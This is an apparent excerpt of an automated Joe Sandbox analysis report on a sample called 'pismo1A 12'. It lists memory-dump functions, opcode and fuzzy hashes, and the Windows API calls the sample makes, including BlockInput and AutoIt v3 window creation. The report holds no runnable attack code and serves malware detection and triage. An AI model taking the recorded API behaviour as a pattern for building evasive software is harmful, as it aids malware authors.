Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: ac01eeeefabd1401c3713fdfc4ec20ab6df57f6da4cd1b45d7c80c86f96b2cc8
Instruction ID: 8d7cd00b27e34f0cb1a17a3fe9467e9360fcde8ff90bd3359aa24dc2d269bf34
Opcode Fuzzy Hash: ac01eeeefabd1401c3713fdfc4ec20ab6df57f6da4cd1b45d7c80c86f96b2cc8
Instruction Fuzzy Hash: D8E01A322002049FD710EF69D805E9AB7EAAF99760F00C41AFC4AD7291DA74AD808B95

Function 006C09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006C03EE), ref: 006C09DA

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e9c28ee0c7d165eaa02debb27d5a68882d7979bc194400c306419d8c266f7029
Instruction ID: bbf3de48b4daf82a1d0eb86bcc1ff413850e7a831aafda678fb063d6ba0d5c7a
Opcode Fuzzy Hash: e9c28ee0c7d165eaa02debb27d5a68882d7979bc194400c306419d8c266f7029
Instruction Fuzzy Hash:

Function 006C781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 006C798B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: e9869f0305de4cde637479190e0cfd137c9e1741ec8b51daf3f9451e1ccc4672
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: B6518B7160D7055BDF388569885EFFE239BDB12340F18052EEA86D7382CA25DE02DF5A

Function 00712046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&w, xrefs: 00712053

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: 0&w
API String ID: 0-3600112441
Opcode ID: 02d88282c74e9cdf9a2aa29203081d3c0f911b59a042ad3464585cbc30f26229
Instruction ID: 722fce28e28ccdffea9497a4a1e9b60edb20f85bab1a84d4b3cf3b066a3aa9a1
Opcode Fuzzy Hash: 02d88282c74e9cdf9a2aa29203081d3c0f911b59a042ad3464585cbc30f26229
Instruction Fuzzy Hash: 3521A8326205118BD728CF79C8226BA73E5E754310F15862EE4A7C37D1DE39A945C784

Function 006D6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a845e73adcc7a6d770a4b77b1f2612f5410a9588099e745f87c9287e6b76daa
Instruction ID: b9446510386943831da2af279f1495a6b48643853e7cd4f00f5e73fb7f55bc5e
Opcode Fuzzy Hash: 4a845e73adcc7a6d770a4b77b1f2612f5410a9588099e745f87c9287e6b76daa
Instruction Fuzzy Hash: 84324626D29F014DD7239634DC22335A28AAFB73C5F55C737F81AB5AAAEF29C4834101

Function 006BCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ce433e64d9b19807ce6f81719c9419b187f166a4f54acf354cd7eecd306c1d
Instruction ID: 07195f7c8cd3fd1ffb198e51c55e2fdf2caa1c8ea2231ebf9fd16c5c88119776
Opcode Fuzzy Hash: 90ce433e64d9b19807ce6f81719c9419b187f166a4f54acf354cd7eecd306c1d
Instruction Fuzzy Hash: 4832F371A0411D8BDF28CB29C6946FD7BA3EB45330F28856AD65ACB395D334DE82DB40

Function 006A7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ffc6e838868791d3bd9657e209eb593fc1aeabc97d1cb2c142f8e077710ba77
Instruction ID: 65a85a3bf5d8183c74801eddc4f885e485ce097790ee045a365a61ab79144e6b
Opcode Fuzzy Hash: 8ffc6e838868791d3bd9657e209eb593fc1aeabc97d1cb2c142f8e077710ba77
Instruction Fuzzy Hash: 8C229DB0A00609EFDF14DF65C881AEEB3B6FF45304F244629E816A7291EB35AD51CB64

Function 006A91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9bbd536f31d0a7073d7a2601b47d40a23ad813de2f993324722c808d25d8942
Instruction ID: 9fd039036daee3f621c8878ad3d88105c005a23417e5499c0ae179dc7eea6741
Opcode Fuzzy Hash: e9bbd536f31d0a7073d7a2601b47d40a23ad813de2f993324722c808d25d8942
Instruction Fuzzy Hash: 1802A5B0A01205EBDF04DF65D881AAEB7B2FF44300F208169E8169B391EB75AE51CF95

Function 006C1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a513773043366fada7c78dd8e710db6c4ba83cfd859ed3bbff3a7af006f67eaf
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 619178725080A34AD72946398574A7DFFE2DE533A1319079DE4F3CE2C2EE24D565D620

Function 006C19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 0f70d78959d114605e315d9d0a84cbd0ce762a29215d43539a28d53fb4fcb133
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 649157726090E34ADB2D427A857497DFFE2DA933A1319079DD4F2CE2C2FD24C965DA20

Function 006C7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813a7c83618a5536bec8805749762b389ef11958f66339e2548b3714930426c3
Instruction ID: 4f8bc44c35cc7858feb2a1cd85d9ce0b317653577311557f197a7e02adf79396
Opcode Fuzzy Hash: 813a7c83618a5536bec8805749762b389ef11958f66339e2548b3714930426c3
Instruction Fuzzy Hash: 1E61777120874AAADB349EA88995FFE239BDF51710F10091EF842CB381DA11EE428F59

Function 006C1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: e68ed80ef0a088da0342b34574ad827fea8f388107a9294ac5e61759c1671c16
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8D81657250D0A34ADB6D4239857497EFFE3DA933A131A079ED4F2CE2C2EE24C555E620

Function 006BD07D Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85af19d856045158542d46d3460f522a9c0a5c3f9b033d50eacd046f9317462a
Instruction ID: 98ee2e134a9d29ffcab5c1eee3dafb0a724a1b3746fb01e5ca31b30236d093e3
Opcode Fuzzy Hash: 85af19d856045158542d46d3460f522a9c0a5c3f9b033d50eacd046f9317462a
Instruction Fuzzy Hash: 0E51966154FEC6AFC30E9B34DA76144FF30BE6351030CC78FC8A54AA86D750A22AD795

Function 010C35E0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: a5586fcc768b06081465c049d16fa690f92afb991fda96eb73a7c0284c76d65b
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8E41D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 010C34D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: ecf00e0f626fa9e016242517e7e1ca8b813e194fd4b188387cc403f7e98e0717
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 48019278A14109EFCB44DF98C5909AEF7F5FB48710F208599E849AB741D730AE41DF80

Function 010C3470 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: aa7029a37f22dede530e91de94aaed5a0d1d8cf4fa631b750d40b431ffcb14ed
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: D301C078A10209EFCB45DF98C5809AEF7F5FB48210B208599E809AB301DB30AE41DF80

Function 010C1E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00722ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00722B30
DeleteObject.GDI32(00000000), ref: 00722B43
DestroyWindow.USER32 ref: 00722B52
GetDesktopWindow.USER32 ref: 00722B6D
GetWindowRect.USER32(00000000), ref: 00722B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00722CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00722CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722CF8
GetClientRect.USER32(00000000,?), ref: 00722D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00722D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722DA8
GlobalFree.KERNEL32(00000000), ref: 00722DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0073FC38,00000000), ref: 00722DDB
GlobalFree.KERNEL32(00000000), ref: 00722DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00722E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00722E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0072303F

Strings

AutoIt v3, xrefs: 00722CF2
DISPLAY, xrefs: 00722EA2
, xrefs: 00722FC5
static, xrefs: 00722D3A, 00722E91

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a109d62a8243cefa5a1e1e4abd9ec8762a30b42ce6ab3ceaa7c2f7f1cf928d64
Instruction ID: e56921f9047e533a0eee8d29a38362c8bec45a93e3b58d7e64c4b110b4e077ba
Opcode Fuzzy Hash: a109d62a8243cefa5a1e1e4abd9ec8762a30b42ce6ab3ceaa7c2f7f1cf928d64
Instruction Fuzzy Hash: C0028F71900214EFDB15DF64DC89EAE7BB9EB49311F048118F915AB2A2DB38DD41CF64

Function 007370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0073712F
GetSysColorBrush.USER32(0000000F), ref: 00737160
GetSysColor.USER32(0000000F), ref: 0073716C
SetBkColor.GDI32(?,000000FF), ref: 00737186
SelectObject.GDI32(?,?), ref: 00737195
InflateRect.USER32(?,000000FF,000000FF), ref: 007371C0
GetSysColor.USER32(00000010), ref: 007371C8
CreateSolidBrush.GDI32(00000000), ref: 007371CF
FrameRect.USER32(?,?,00000000), ref: 007371DE
DeleteObject.GDI32(00000000), ref: 007371E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00737230
FillRect.USER32(?,?,?), ref: 00737262
GetWindowLongW.USER32(?,000000F0), ref: 00737284

Part of subcall function 007373E8: GetSysColor.USER32(00000012), ref: 00737421
Part of subcall function 007373E8: SetTextColor.GDI32(?,?), ref: 00737425
Part of subcall function 007373E8: GetSysColorBrush.USER32(0000000F), ref: 0073743B
Part of subcall function 007373E8: GetSysColor.USER32(0000000F), ref: 00737446
Part of subcall function 007373E8: GetSysColor.USER32(00000011), ref: 00737463
Part of subcall function 007373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00737471
Part of subcall function 007373E8: SelectObject.GDI32(?,00000000), ref: 00737482
Part of subcall function 007373E8: SetBkColor.GDI32(?,00000000), ref: 0073748B
Part of subcall function 007373E8: SelectObject.GDI32(?,?), ref: 00737498
Part of subcall function 007373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007374B7
Part of subcall function 007373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007374CE
Part of subcall function 007373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007374DB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 11e06e0556ac16b8c9d1825efa4642671cf1fa688833d5df67ec5cac033061f4
Instruction ID: 37cae0a67883ee1fb94f064bb539291f1f637889bf192c9cd7dfef3ebe438560
Opcode Fuzzy Hash: 11e06e0556ac16b8c9d1825efa4642671cf1fa688833d5df67ec5cac033061f4
Instruction Fuzzy Hash: 09A1C2B2008305EFEB159F60DC48E5B7BB9FB88321F104A19F9A2A61E1D779E840DB51

Function 006B8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 006B8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 006F6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006F6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006F6F43

Part of subcall function 006B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006B8BE8,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8FC5

SendMessageW.USER32(?,00001053), ref: 006F6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006F6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 006F6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 006F6FB7

Strings

0, xrefs: 006F6DCF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 5ea91b67da507c2e4b6e4ed10e4376fdedfe86dbc26071c898a1d78a0b599ace
Instruction ID: 83ce66b5ccfac9bb31bbf6b38032168892e0502141556a722dc48e12c407587a
Opcode Fuzzy Hash: 5ea91b67da507c2e4b6e4ed10e4376fdedfe86dbc26071c898a1d78a0b599ace
Instruction Fuzzy Hash: E312A870204255EFDB25DF28C884BFAB7A6FF44300F548469F6899B261CB35E892CF95

Function 00722711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0072273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0072286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007228A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007228B9
